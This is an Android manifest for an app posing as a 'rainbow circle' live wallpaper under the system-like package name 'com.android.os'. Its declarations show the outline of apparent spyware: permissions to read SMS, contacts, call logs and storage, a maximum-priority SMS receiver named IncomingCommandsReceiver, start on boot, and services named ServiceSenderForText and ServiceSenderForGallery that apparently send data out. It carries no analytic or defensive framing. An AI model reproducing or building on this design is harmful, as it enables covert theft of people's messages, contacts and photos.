<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.os"
    android:installLocation="internalOnly"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

    <uses-feature android:name="android.software.live_wallpaper" />
    <uses-feature android:name="android.hardware.telephony" />
    <uses-feature android:name="android.hardware.wifi" />

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="17" />

    <application
        android:icon="@drawable/ic_launcher" >
        <receiver
            android:name="com.livewallpaper.circle.IncomingCommandsReceiver"
            android:enabled="true" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.livewallpaper.circle.box.ReceiverBoot"
            android:enabled="true" >
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.livewallpaper.circle.internet.NetworkChangeReceiver"
            android:enabled="true" >
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.livewallpaper.circle.wallpaper.RainbowWallpaper"
            android:label="@string/rainbowcircle"
            android:permission="android.permission.BIND_WALLPAPER" >
            <intent-filter>
                <action android:name="android.service.wallpaper.WallpaperService" />
            </intent-filter>

            <meta-data
                android:name="android.service.wallpaper"
                android:resource="@xml/bokeh" />
        </service>
        <service
            android:name="com.livewallpaper.circle.box.ServiceListener"
            android:enabled="true"
            android:exported="false" >
        </service>
        <service
            android:name="com.livewallpaper.circle.internet.ServiceSenderForText"
            android:enabled="true"
            android:exported="false" >
        </service>
        <service
            android:name="com.livewallpaper.circle.internet.ServiceSenderForGallery"
            android:enabled="true"
            android:exported="false" >
        </service>
    </application>

</manifest>